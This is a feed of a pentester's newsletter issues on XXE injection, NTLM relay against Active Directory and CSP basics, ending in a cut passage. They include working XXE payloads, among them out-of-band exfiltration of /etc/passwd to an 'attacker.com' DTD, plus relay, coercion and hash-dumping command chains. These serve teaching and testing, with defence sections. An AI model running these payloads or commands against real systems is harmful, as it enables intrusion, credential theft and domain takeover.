Every major Web3 exploit, from the $600M Poly Network hack to the countless phishing attacks draining wallets daily, exploits this gap between cryptographic perfection and human fallibility.

Understanding signatures isn&apos;t just about passing an interview or building a dApp. It&apos;s about survival in an ecosystem where a single mistaken signature can cost you everything you own.

So take this knowledge seriously. Test the code. Break things in your local environment. Build security into your mental models from day one.

Because in Web3, there&apos;s no undo button.</content:encoded><author>Ruben Santos</author></item><item><title>XXE Injection: When XML Parsers Become Your Worst Enemy</title><link>https://www.kayssel.com/newsletter/issue-22</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-22</guid><description>From basic file disclosure to blind out-of-band exfiltration: a practical guide to finding and exploiting XXE vulnerabilities</description><pubDate>Sun, 02 Nov 2025 10:00:00 GMT</pubDate><content:encoded>Hey everyone,

A few weeks ago, a colleague was testing an internal API and stumbled on an XXE vulnerability. The thing is, it was blind. No direct output, no error messages, nothing. We knew the parser was processing our entities, but we couldn&apos;t figure out how to exfiltrate the data properly. We tried a few OOB techniques, but honestly, we didn&apos;t nail the exploitation.

That stuck with me. I hate leaving vulnerabilities half-exploited. So I spent some time digging deeper into blind XXE, out-of-band exfiltration, and all the edge cases we probably missed.

The thing about XXE is that it&apos;s one of those vulnerabilities that feels almost too easy when you find it. But when you don&apos;t know what to look for, you&apos;ll walk right past it. And that&apos;s exactly why it keeps showing up in penetration tests, bug bounty reports, and CVEs year after year.

So let&apos;s fix that. This newsletter breaks down XML External Entity (XXE) injection: what it is, how it works, and how to exploit it from basic file disclosure to blind out-of-band exfiltration.

## What XXE Actually Is

XXE is a vulnerability that lets you abuse how XML parsers process external entities. When an application parses XML without properly configuring its parser, you can inject malicious entity declarations that force the server to:

- Read arbitrary files from the filesystem
- Make HTTP requests to internal systems (SSRF)
- Perform denial of service attacks
- In rare cases, achieve remote code execution

The root cause is simple: the XML 1.0 specification allows entities (basically variables in XML) to reference external resources. If the parser follows those references and the input isn&apos;t sanitized, attackers control what gets loaded.

Here&apos;s the basic structure of an XXE payload:

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;
]&gt;
&lt;root&gt;
  &lt;data&gt;&amp;xxe;&lt;/data&gt;
&lt;/root&gt;
```

When the parser processes this, it reads `/etc/passwd` and injects its contents where `&amp;xxe;` appears. If that data shows up in the application&apos;s response, you&apos;ve got file disclosure.

## Why This Still Matters in 2025

You&apos;d think this would be fixed by now, right? It&apos;s been on the OWASP Top 10 since 2017. But XXE vulnerabilities keep showing up.

**Recent examples:**

- **[CVE-2024-34102](https://nvd.nist.gov/vuln/detail/CVE-2024-34102) (CosmicSting)** – A critical unauthenticated XXE in Adobe Commerce and Magento that could lead to remote code execution. Affected versions before 2.4.7-p1. CVSS score: 9.8/10.

- **[CVE-2024-30043](https://nvd.nist.gov/vuln/detail/CVE-2024-30043)** – XXE in Microsoft SharePoint Server allowing file read with Farm Service account permissions and SSRF attacks. Patched in May 2024.

- **[CVE-2023-42344](https://vulners.com/cve/CVE-2023-42344)** – Unauthenticated XXE in OpenCMS (versions 9.0.0 to 10.5.0) allowing remote code execution without authentication.

These aren&apos;t small apps. These are enterprise platforms with millions of users. The problem? Legacy code, third-party libraries with insecure defaults, and developers who don&apos;t realize their XML parser is dangerous out of the box.

## Finding XXE Vulnerabilities

Not every endpoint that accepts XML is vulnerable. Modern frameworks often disable external entities by default. But you&apos;d be surprised how many don&apos;t.

### Where to Look

Check any functionality that processes XML:

- File uploads (especially DOCX, XLSX, SVG, or other XML-based formats)
- API endpoints that accept `Content-Type: application/xml`
- SOAP services
- RSS/Atom feed parsers
- SAML authentication flows
- Configuration file uploads

### Testing for XXE

Start with a basic probe. Send this payload and see if the parser even processes entities:

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY test &quot;HelloXXE&quot;&gt;
]&gt;
&lt;root&gt;
  &lt;data&gt;&amp;test;&lt;/data&gt;
&lt;/root&gt;
```

If the response includes &quot;HelloXXE&quot; where you referenced `&amp;test;`, the parser is processing entities. Now you can escalate.

## Basic File Disclosure

The classic XXE attack: read files from the server&apos;s filesystem.

&lt;details&gt;
&lt;summary&gt;Payload to read /etc/passwd:&lt;/summary&gt;

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;
]&gt;
&lt;root&gt;
  &lt;username&gt;&amp;xxe;&lt;/username&gt;
&lt;/root&gt;
```
&lt;/details&gt;

If the application reflects the `&lt;username&gt;` value in its response, you&apos;ll see the contents of `/etc/passwd`.

**Common files to target:**

- `/etc/passwd` – User accounts (Linux/Unix)
- `/etc/hosts` – Network configuration
- `C:\Windows\System32\drivers\etc\hosts` – Windows hosts file
- `/proc/self/environ` – Environment variables (might leak secrets)
- Application config files (e.g., `/var/www/html/config.php`)
- Cloud metadata endpoints (more on this in a sec)

One thing to watch out for: some files contain characters that break XML parsing (like `&lt;` or `&amp;`). We&apos;ll handle that with Base64 encoding in the blind XXE section.

## XXE to SSRF

This is where XXE gets really interesting. Instead of reading local files, you can make the server send HTTP requests to internal systems.

&lt;details&gt;
&lt;summary&gt;Example payload:&lt;/summary&gt;

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY xxe SYSTEM &quot;http://internal-service:8080/admin&quot;&gt;
]&gt;
&lt;root&gt;
  &lt;data&gt;&amp;xxe;&lt;/data&gt;
&lt;/root&gt;
```
&lt;/details&gt;

The server makes an HTTP request to `http://internal-service:8080/admin` and includes the response in its output. This bypasses firewalls and gives you access to internal APIs, admin panels, or cloud metadata endpoints.

**Cloud metadata exploitation:**

If you&apos;re testing an app running on AWS, try this:

```xml
&lt;!ENTITY xxe SYSTEM &quot;http://169.254.169.254/latest/meta-data/iam/security-credentials/&quot;&gt;
```

This hits the AWS metadata service and can leak IAM credentials with full access to the cloud account. Same concept works for Azure (`http://169.254.169.254/metadata/instance?api-version=2021-02-01`) and GCP.

Combined with my [SSRF newsletter from Issue 4](https://www.kayssel.com/post/ssrf/), you can chain XXE into full internal network access.

## Blind XXE: When You Don&apos;t See Output

Sometimes the application doesn&apos;t reflect the XML data in its response. The parser processes your payload, but you don&apos;t see the result. That&apos;s blind XXE.

### Out-of-Band (OOB) Exfiltration

The trick here is to make the server send the data to a system you control. You need two things:

1. A server you control to receive the data (use Burp Collaborator, your own VPS, or `webhook.site`)
2. A payload that references an external DTD hosted on your server

**Step 1: Host a malicious DTD on your server (`http://attacker.com/evil.dtd`):**

```xml
&lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;
&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; exfil SYSTEM &apos;http://attacker.com/?data=%file;&apos;&gt;&quot;&gt;
%eval;
%exfil;
```

**Step 2: Send this payload to the target:**

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY % dtd SYSTEM &quot;http://attacker.com/evil.dtd&quot;&gt;
  %dtd;
]&gt;
&lt;root&gt;&lt;/root&gt;
```

Here&apos;s what happens:

1. The parser loads your external DTD
2. The DTD defines a parameter entity that reads `/etc/passwd`
3. It defines another entity that makes an HTTP request to your server, embedding the file contents in the URL
4. Your server receives the request with the file data in the query string

**Pro tip:** If the file contains special characters that break URLs, wrap it in Base64:

```xml
&lt;!ENTITY % file SYSTEM &quot;php://filter/convert.base64-encode/resource=/etc/passwd&quot;&gt;
```

Then Base64-decode the exfiltrated data on your end.

### Error-Based Blind XXE

If OOB doesn&apos;t work (firewalls, no egress, etc.), you can sometimes leak data through error messages. This technique also typically requires an external DTD.

**Malicious DTD hosted on your server (`http://attacker.com/error.dtd`):**

```xml
&lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;
&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; error SYSTEM &apos;file:///nonexistent/%file;&apos;&gt;&quot;&gt;
%eval;
%error;
```

**Payload sent to target:**

```xml
&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [
  &lt;!ENTITY % dtd SYSTEM &quot;http://attacker.com/error.dtd&quot;&gt;
  %dtd;
]&gt;
&lt;root&gt;&lt;/root&gt;
```

The parser tries to access a file at `/nonexistent/[contents of /etc/passwd]`, fails, and includes the file path (with embedded file contents) in the error message.

**Note:** Because of XML specification restrictions on using parameter entities within internal DTDs, this technique requires either an external DTD or repurposing an existing local DTD file on the server.

## XXE in Unexpected Places

Don&apos;t just test plain XML endpoints. XXE hides in formats you wouldn&apos;t expect.

### File Uploads

**SVG images** are XML-based. If an app lets you upload profile pictures and processes SVG files, try embedding an XXE payload:

```xml
&lt;?xml version=&quot;1.0&quot; standalone=&quot;yes&quot;?&gt;
&lt;!DOCTYPE svg [
  &lt;!ENTITY xxe SYSTEM &quot;file:///etc/hostname&quot;&gt;
]&gt;
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;
  &lt;text&gt;&amp;xxe;&lt;/text&gt;
&lt;/svg&gt;
```

Upload it, and if the app displays or processes the SVG server-side, you might trigger XXE.

**DOCX and XLSX** files are ZIP archives containing XML. Extract one, modify the XML inside (e.g., `word/document.xml`), inject your payload, rezip it, and upload. I&apos;ve seen this work in document preview features and automated processing systems.

### XInclude Attacks

Sometimes you don&apos;t control the entire XML document, just a single value inside it. Standard XXE won&apos;t work because you can&apos;t define a DOCTYPE. That&apos;s where XInclude comes in.

&lt;details&gt;
&lt;summary&gt;If you control a value in the XML, try this:&lt;/summary&gt;

```xml
&lt;foo xmlns:xi=&quot;http://www.w3.org/2001/XInclude&quot;&gt;
  &lt;xi:include parse=&quot;text&quot; href=&quot;file:///etc/passwd&quot;/&gt;
&lt;/foo&gt;
```
&lt;/details&gt;

XInclude lets you include external files directly in XML elements, bypassing the need for entity declarations.

### Content-Type Switching

Some apps accept `Content-Type: application/json` but also parse `application/xml` if you send it. Try switching your POST request from JSON to XML and see if the endpoint still processes it.

&lt;details&gt;
&lt;summary&gt;From this:&lt;/summary&gt;

```http
POST /api/user HTTP/1.1
Content-Type: application/json

{&quot;username&quot;: &quot;test&quot;}
```
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;To this:&lt;/summary&gt;

```http
POST /api/user HTTP/1.1
Content-Type: application/xml

&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE root [&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;
&lt;root&gt;&lt;username&gt;&amp;xxe;&lt;/username&gt;&lt;/root&gt;
```
&lt;/details&gt;

If the backend uses a library that auto-detects content types or falls back to XML parsing, you might trigger XXE on an endpoint that wasn&apos;t designed to accept XML.

## Tools You Need

**Burp Suite** – Essential for intercepting and modifying requests. Burp Collaborator is perfect for OOB testing.

**XXEinjector** – Automates XXE exploitation including OOB exfiltration and enumeration. Supports direct and out-of-band methods (FTP, HTTP, Gopher).
[https://github.com/enjoiz/XXEinjector](https://github.com/enjoiz/XXEinjector)

**DTD Finder** – Lists DTDs and generates XXE payloads using local DTD files. Useful for blind XXE exploitation.
[https://github.com/GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder)

**PayloadsAllTheThings (XXE Section)** – Comprehensive payload collection with classic XXE, OOB, and various exploitation techniques.
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection)

## Where to Practice

**PortSwigger Web Security Academy** – Multiple XXE labs with increasing difficulty. All labs are free:
- [Exploiting XXE to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files)
- [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf)
- [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
- [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack)

Main XXE page: [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)

**TryHackMe – XXE Injection Room** – Premium room covering in-band, out-of-band, and expansion XXE attacks. Includes exercises chaining XXE with SSRF.
[https://tryhackme.com/room/xxeinjection](https://tryhackme.com/room/xxeinjection)

**Hack The Box – BountyHunter** – Easy-rated Linux machine featuring XXE exploitation to read PHP source files and dump database credentials. Good introduction to practical XXE in a realistic scenario.
[https://app.hackthebox.com/machines/BountyHunter](https://app.hackthebox.com/machines/BountyHunter)

## Defense and Detection

If you&apos;re defending against XXE, here&apos;s what actually works:

**Disable External Entities** – The nuclear option. Most XML libraries have config flags to disable DTD processing entirely. Use them.

```java
// Java example
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature(&quot;http://apache.org/xml/features/disallow-doctype-decl&quot;, true);
```

**Use Simple Data Formats** – If you don&apos;t need XML&apos;s complexity, use JSON. Fewer features = smaller attack surface.

**Input Validation** – Reject any XML containing `DOCTYPE`, `ENTITY`, or `SYSTEM` keywords. Not foolproof, but catches lazy attacks.

**Least Privilege** – Run your XML parser with minimal file system access. If it can&apos;t read `/etc/passwd`, XXE becomes much less useful.

**Monitor Outbound Traffic** – Blind XXE relies on exfiltration. Alert on unexpected HTTP requests from your backend to external IPs.

## Wrapping Up

XXE is one of those vulnerabilities that seems straightforward on paper but has a surprising amount of depth. Basic file disclosure is the entry point, but once you understand OOB exfiltration, SSRF chaining, and hunting XXE in unexpected formats like SVG or DOCX, you unlock a whole new class of attack vectors.

The reason XXE keeps appearing in CVEs is that it&apos;s easy to miss. An app might not directly accept XML, but a third-party library processing uploaded files might. Or an API endpoint designed for JSON might fall back to XML parsing. Or a developer might enable XML features &quot;just in case&quot; and never disable them.

So next time you&apos;re testing an app, grep for XML. Check file uploads. Try content-type switching. You might be surprised what you find.

## Coming This Week

This week, probably on Wednesday, I&apos;ll be publishing a new article in the Web3 series: an introduction to how signatures work in Ethereum. We&apos;ll cover the fundamentals of digital signatures, how Ethereum implements them, and why they&apos;re critical for smart contract and wallet security. It&apos;s the perfect starting point before diving into replay attacks and other signature-based exploitation techniques.

Thanks for reading, and happy hunting.

Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>NTLM Relay: Why Authentication in AD is Still Broken</title><link>https://www.kayssel.com/newsletter/issue-21</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-21</guid><description>How to force machines to authenticate to you, relay their credentials, and take over domains</description><pubDate>Sun, 26 Oct 2025 10:00:00 GMT</pubDate><content:encoded>Hey everyone,

It&apos;s been a while since I&apos;ve talked about Active Directory attacks. These days I&apos;m mostly focused on Web3 security at work, so I don&apos;t get to play with Windows environments as much as I used to. But NTLM Relay attacks hold a special place for me.

Back in university, I realized pretty quickly that our curriculum didn&apos;t cover Windows security at all. Everything was Linux, networking fundamentals, maybe some basic web security. But I knew that most companies run Active Directory, and if I wanted to be useful in real environments, I needed to understand how to break into them.

So for my final thesis project, I built [Igris](https://github.com/rsgbengi/Igris), a tool similar to CrackMapExec for attacking AD environments. It forced me to really dig into how SMB, NTLM, Kerberos, and all these protocols actually work under the hood. That project taught me more about offensive security than any class did.

I [wrote a detailed article about NTLM basics](https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics/) a while back that covers the foundational concepts. This newsletter builds on that and focuses on the newer coercion techniques and relay methods that have emerged over the past few years.

One thing I want to mention upfront: NTLM Relay attacks can generate a lot of noise on the network unless they&apos;re very targeted. Authentication attempts, failed logins, unusual traffic patterns, all of it shows up in logs. So in real engagements, I usually save these for later in the assessment. They tend to work really well, but if you&apos;re trying to stay under the radar, you don&apos;t want to start blasting coercion attacks at every machine on the network. Use them strategically.

And honestly, I needed the refresher myself. When you spend months auditing smart contracts, you start to forget the muscle memory of AD exploitation. So let&apos;s get back into it.

## What NTLM Relay Actually Is

When you authenticate to a Windows machine using NTLM, you&apos;re basically doing a challenge-response exchange. The server sends you a challenge, you hash it with your password, send it back, and the server verifies it.

NTLM Relay takes advantage of a fundamental flaw: if you can intercept that authentication attempt, you can forward it to a different server. You&apos;re not cracking the password. You&apos;re just passing the authentication along to another machine that accepts NTLM.

Here&apos;s the flow:

```
1. Victim tries to authenticate to Attacker
2. Attacker receives the auth attempt
3. Attacker forwards it to Target server
4. Target accepts it (thinks it&apos;s talking to Victim)
5. Attacker now has authenticated session as Victim
```

The key thing to understand: you&apos;re not stealing credentials. You&apos;re hijacking an authentication conversation that&apos;s already happening.

## Why NTLM Still Exists

Good question. Kerberos has been the default since Windows 2000. Why is NTLM still around?

Legacy systems. Third-party applications that don&apos;t support Kerberos. Fallback mechanisms when Kerberos fails. Workgroup environments. And the big one: organizations that never actually disabled it because &quot;something might break.&quot;

Microsoft has been trying to kill NTLM for years. They keep pushing it back. Last I checked, the deprecation timeline got extended again. So for the foreseeable future, NTLM is still in play, which means these attacks still work.

## Forcing Authentication: Coercion Attacks

The hardest part of NTLM Relay used to be getting someone to authenticate to you. You&apos;d set up Responder, poison some LLMNR/NBT-NS traffic, and hope someone mistyped a UNC path.

Then coercion attacks changed everything. These are techniques that abuse legitimate Windows features to force a machine to authenticate to an attacker-controlled server. No user interaction needed.

### PetitPotam

This one made waves in 2021. It abuses the MS-EFSRPC protocol (Encrypting File System Remote Protocol) to trigger authentication. Any domain user can call it, and you can force a Domain Controller to authenticate to you.

```bash
python3 PetitPotam.py attacker-ip target-dc-ip
```

When this came out, it was being used to relay DC authentication to AD CS servers and get certificates that let you impersonate the DC. Instant domain compromise.

### PrinterBug (SpoolSample)

Older but still works. Abuses the Print Spooler service. If the spooler is running (and it usually is), you can force a machine to authenticate to you.

```bash
python3 printerbug.py &apos;domain.local/user:password&apos;@target-ip attacker-ip
```

The beauty of this one is that it works against servers, not just workstations. So you can hit file servers, SQL servers, whatever&apos;s running the spooler.

### DFSCoerce

Exploits the DFS (Distributed File System) protocol. Similar idea, different protocol.

```bash
python3 dfscoerce.py -u user -p password -d domain.local attacker-ip target-ip
```

### ShadowCoerce

Abuses the Volume Shadow Copy service. Less commonly patched than some of the others.

```bash
python3 shadowcoerce.py -d domain.local -u user -p password attacker-ip target-ip
```

There are more. New ones get discovered periodically. The pattern is always the same: find a protocol that triggers authentication, call it remotely, force the target to connect back to you.

## NTLM Relay to SMB

The classic target. If SMB signing is disabled or not required, you can relay NTLM authentication to SMB shares and execute commands.

First, set up your relay:

```bash
ntlmrelayx.py -tf targets.txt -smb2support -c &quot;whoami&quot;
```

The `-tf` flag points to a file with target IPs. `-smb2support` handles SMB2/3. `-c` specifies the command to run when you get a session.

Then trigger authentication from your victim to your attacking machine. If the victim has admin rights on the target, you get code execution.

&lt;details&gt;
&lt;summary&gt;Better yet, drop an interactive shell:&lt;/summary&gt;

```bash
ntlmrelayx.py -tf targets.txt -smb2support -i
```
&lt;/details&gt;

When a relay succeeds, it&apos;ll spawn a local SMB or SOCKS server that you can connect to for an interactive session.

## NTLM Relay to LDAP

This is where things get interesting. Relaying to LDAP lets you modify Active Directory without needing DA privileges.

&lt;details&gt;
&lt;summary&gt;Common attacks:&lt;/summary&gt;

- Add a user to privileged groups (Domain Admins, Enterprise Admins)
- Create a new computer account and abuse RBCD (Resource-Based Constrained Delegation)
- Grant DCSync rights to a user you control
- Modify ACLs to give yourself permissions

&lt;/details&gt;

Set it up:

```bash
ntlmrelayx.py -t ldap://dc-ip --escalate-user lowpriv-user
```

This will try to give DCSync rights to `lowpriv-user`. If you relay a Domain Admin&apos;s auth, it works. Then you just run:

```bash
secretsdump.py domain.local/lowpriv-user:password@dc-ip -just-dc
```

And dump all the hashes in the domain.

Another useful one is creating a computer account and abusing RBCD:

```bash
ntlmrelayx.py -t ldaps://dc-ip --delegate-access
```

When you relay a machine account&apos;s authentication, this creates a new computer object and configures delegation so you can impersonate any user on the relayed machine.

## NTLM Relay to LDAPS (with Signing)

LDAP signing is a common mitigation. But if the target supports LDAPS (LDAP over SSL), you can still relay to it.

```bash
ntlmrelayx.py -t ldaps://dc-ip --escalate-user lowpriv-user
```

The `s` matters. LDAPS on port 636 instead of 389.

## NTLM Relay to HTTP/WebDAV

If you find an internal web app that uses NTLM authentication, you can relay to it. WebDAV endpoints are particularly interesting because they often allow file uploads.

```bash
ntlmrelayx.py -t http://webapp-ip/webdav/
```

If the relayed user has write access, you might be able to drop a webshell.

## NTLM Relay to AD CS (ESC8)

Active Directory Certificate Services is a high-value target. If you can relay to the Web Enrollment endpoint, you can request certificates on behalf of the victim.

```bash
ntlmrelayx.py -t http://adcs-server/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
```

If you relay a DC&apos;s authentication and request a DC certificate, you can use that cert to authenticate as the DC. From there, you can DCSync or do whatever you want.

This is exactly what PetitPotam was being used for when it first dropped.

## Putting It All Together

Here&apos;s a realistic attack flow:

&lt;details&gt;
&lt;summary&gt;1. Enumerate the network for machines without SMB signing:&lt;/summary&gt;

```bash
nxc smb targets.txt --gen-relay-list relay-targets.txt
```
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;2. Start your relay targeting LDAP to escalate a user:&lt;/summary&gt;

```bash
ntlmrelayx.py -tf relay-targets.txt -t ldap://dc-ip --escalate-user attacker
```
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;3. Trigger authentication from a high-value target (like a DC or admin workstation):&lt;/summary&gt;

```bash
python3 PetitPotam.py your-ip dc-ip
```
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;4. If the relay succeeds and grants you DCSync rights:&lt;/summary&gt;

```bash
secretsdump.py domain.local/attacker:password@dc-ip -just-dc
```
&lt;/details&gt;

5. Extract the krbtgt hash and create a Golden Ticket. Domain owned.

## Tools You Need

**ntlmrelayx.py** – The core relay tool. Part of Impacket.
[impacket](https://github.com/fortra/impacket)

**Responder** – Poison LLMNR/NBT-NS, capture auth attempts.
[Responder](https://github.com/lgandx/Responder)

**PetitPotam** – Force DC authentication.
[PetitPotam](https://github.com/topotam/PetitPotam)

**Coercer** – All-in-one coercion tool. Supports multiple protocols.
[Coercer](https://github.com/p0dalirius/Coercer)

**NetExec (nxc)** – Enumerate SMB signing, identify relay targets.
[NetExec](https://github.com/Pennyw0rth/NetExec)

## Defense and Detection

If you&apos;re on the blue team side, here&apos;s what actually stops these attacks:

**Enable SMB Signing** – Require it on all machines. This kills relay to SMB.

```powershell
Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options
Microsoft network server: Digitally sign communications (always) - Enabled
```

**LDAP Signing and Channel Binding** – Prevents relay to LDAP/LDAPS.

**Disable NTLM** – The nuclear option. Test heavily first because things will break.

**Patch Print Spooler, disable unnecessary services** – Limits coercion vectors.

**Monitor for coercion attempts** – Look for unusual EFSRPC, RPC, DFS calls in logs. Tools like MDI (Microsoft Defender for Identity) can detect some of these.

## Where to Practice

You need a lab for this. These attacks don&apos;t translate well to static challenges.

**Your own AD lab** – Spin up a Domain Controller, a few Windows clients, disable SMB signing, and practice relaying. I&apos;ve written about setting up offensive labs [here](https://www.kayssel.com/series/offensive-lab/).

**HTB Machines**:

- **Forest** – Good intro to AD attacks, includes NTLM relay to LDAP and DCSync
- **Escape** – NTLM relay in Active Directory environments
- **Mist** – Advanced NTLM relay techniques
- **Reaper** – NTLM relay attack detection and exploitation
- **Reel2** – Phishing to steal Net-NTLMv2 hashes via Outlook Web App

## Wrapping Up

NTLM Relay attacks are old, well-documented, and still work all the time. The core vulnerability hasn&apos;t changed. What has changed is the number of ways you can force authentication without user interaction.

Coercion attacks like PetitPotam turned NTLM Relay from an opportunistic attack into a reliable exploitation technique. Combined with relay to LDAP or AD CS, you can go from any domain user to Domain Admin in minutes.

If you&apos;re pentesting AD environments and you&apos;re not checking for relay opportunities, you&apos;re missing easy wins. And if you&apos;re defending AD, make sure SMB signing is enforced and LDAP signing is enabled. These mitigations actually work.

For me, revisiting these techniques after months of smart contract auditing is like coming back home. The mindset is different, the tools are different, but the satisfaction of chaining together a clean attack path? That never changes.

Thanks for reading. Hope this gives you another tool in your AD toolkit.

## Website Updates

Quick heads up: I&apos;ve completely rebuilt the Kayssel website. Migrated from Ghost CMS to a full Astro static site. The backend is now much faster and cleaner.

**What&apos;s new:**
- **Light theme** - Finally added a light theme option
- **Improved search** - Much more responsive and easier to use
- **Better reading experience** - Enhanced post layout and typography
- **Keybindings on desktop** - Navigate faster with keyboard shortcuts

If you spot anything weird or broken, please let me know. I&apos;ve tested everything, but there&apos;s always something that slips through. Drop me a message on [Twitter](https://twitter.com/rsgbengii) or [Mastodon](https://infosec.exchange/@rsgbengi) if you run into issues.

Stay sharp,
Ruben</content:encoded><category>Newsletter</category><category>active-directory</category><author>Ruben Santos</author></item><item><title>CSP for Pentesters: Understanding the Fundamentals</title><link>https://www.kayssel.com/newsletter/issue-20</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-20</guid><description>Understanding the basics and spotting weak configurations</description><pubDate>Sun, 19 Oct 2025 10:15:31 GMT</pubDate><content:encoded>Hi everyone,

A few weeks ago I was knee-deep in a CTF challenge. Found an XSS vulnerability, felt good about it, crafted my payload, and... nothing. The page just sat there, mocking me. Turns out the CSP was configured in this very specific way that blocked everything I tried. Spent the next hour actually reading the policy line by line, understanding what was allowed and what wasn&apos;t. Eventually got it, but man, it made me realize how little attention I&apos;d been paying to this header.

So that&apos;s what sparked this newsletter. I want to break down how CSP actually works and, more importantly, where people screw it up.

Quick side note: I&apos;m also working on improving the website right now. Adding a white theme because apparently some of you don&apos;t live in dark mode like civilized people, plus keybindings and a bunch of other stuff. Should be ready soon 😄

## What CSP Actually Is

Picture this: you&apos;re running a nightclub. You don&apos;t want random people wandering in off the street, so you hire a bouncer. That bouncer has a list, and if you&apos;re not on it, you&apos;re not getting in. CSP is essentially that bouncer, but for your browser.

The server sends a policy to the browser saying &quot;hey, only execute scripts from these specific places I trust.&quot; When you try to inject malicious code from somewhere else, the browser goes &quot;nope, not on the list&quot; and blocks it. In theory, it&apos;s brilliant. In practice, well, that&apos;s why we&apos;re here.

Here&apos;s what the flow looks like:

```bash
Server: &quot;Content-Security-Policy: script-src &apos;self&apos;&quot;
You: &lt;script src=&quot;https://evil.com/xss.js&quot;&gt;
Browser: *blocked*
Console: &quot;CSP violation: refused to load...&quot;

```

The problem is that configuring this correctly is way harder than it sounds. One wrong directive and the whole thing falls apart.

## How It Actually Works

CSP operates through directives. Think of them as individual rules in that bouncer&apos;s handbook. Each directive controls a different type of resource.

```bash
Content-Security-Policy: script-src &apos;self&apos; https://trusted.com; style-src &apos;self&apos;

```

This tells the browser: &quot;Scripts can come from our domain or trusted.com. CSS can only come from our domain.&quot; Pretty straightforward, right?

But here&apos;s where it gets interesting. If you don&apos;t specify a directive, it falls back to `default-src` if that exists. And if `default-src` doesn&apos;t exist either? No restriction at all. That&apos;s the first place things start to break.

## The Directives That Matter

Let me walk you through the ones you&apos;ll actually care about as a pentester.

`script-src` is your main target. This controls what JavaScript can execute. If you can bypass this, you win. Simple as that. Everything else is just noise compared to getting code execution.

`default-src` acts as the fallback. Here&apos;s something that trips people up constantly: if you see `default-src &apos;self&apos;` and nothing else, that means EVERY type of resource uses &apos;self&apos;. Scripts, images, styles, everything. It&apos;s more restrictive than it looks at first glance.

`object-src` controls those old-school tags like `&lt;object&gt;`, `&lt;embed&gt;`, and `&lt;applet&gt;`. Flash, plugins, embedded PDFs. You know what&apos;s funny? People forget about this one all the time. They&apos;ll lock down their scripts super tight and completely forget that object tags exist. That&apos;s an instant bypass opportunity right there.

`base-uri` is the sneaky one. It controls the `&lt;base&gt;` tag, which sets the base URL for the entire document. When this is missing (and it&apos;s missing a lot), you can do some really creative stuff. We&apos;ll get to that in a minute.

## Special Values You Need to Know

CSP has these special keywords that go in single quotes. Understanding what these mean is crucial because they&apos;re often where the vulnerabilities hide.

`&apos;self&apos;` means same origin. Same domain, same protocol, same port. If you&apos;re on `https://example.com`, only stuff from exactly `https://example.com` works. Not even subdomains get a pass.

`&apos;none&apos;` blocks everything. Most restrictive option possible. Not even same-origin content gets through.

`&apos;unsafe-inline&apos;` is where things get interesting. This allows inline scripts, and when you see it, you should get excited. Remember that CTF I mentioned? The one that didn&apos;t have this was what made my life difficult. When it&apos;s there, all your traditional XSS techniques just work.

What does inline mean exactly? It&apos;s JavaScript embedded directly in the HTML instead of loaded from a separate file:

```html
&lt;script&gt;alert(1)&lt;/script&gt;
&lt;img src=x onerror=&quot;alert(1)&quot;&gt;
&lt;button onclick=&quot;alert(1)&quot;&gt;Click&lt;/button&gt;

```

All of these are inline. A proper CSP blocks them unless `&apos;unsafe-inline&apos;` is present. But here&apos;s the thing: tons of legacy applications have inline scripts scattered everywhere. Refactoring all of that is a massive undertaking, so devs take the easy way out. They slap `&apos;unsafe-inline&apos;` in there &quot;temporarily&quot; and call it a day. I&apos;ve seen &quot;temporary&quot; fixes that have been in production for three years.

`&apos;unsafe-eval&apos;` is similar but for a different type of code execution. It allows functions like `eval()` that take strings and execute them as code:

```javascript
eval(&apos;alert(1)&apos;);
setTimeout(&apos;alert(1)&apos;, 0);
new Function(&apos;alert(1)&apos;)();

```

If you can control what string gets passed to any of these functions, and `&apos;unsafe-eval&apos;` is present, you&apos;re in.

Then there are the wildcards. `*` means any domain. `https:` means any HTTPS site (which is basically everything now). `data:` allows data URIs, so you can embed code directly in a URL. `*.example.com` allows any subdomain. All of these are red flags because they&apos;re way too permissive.

## Where Things Break Down

Let me show you the misconfigurations I see over and over again in real assessments.

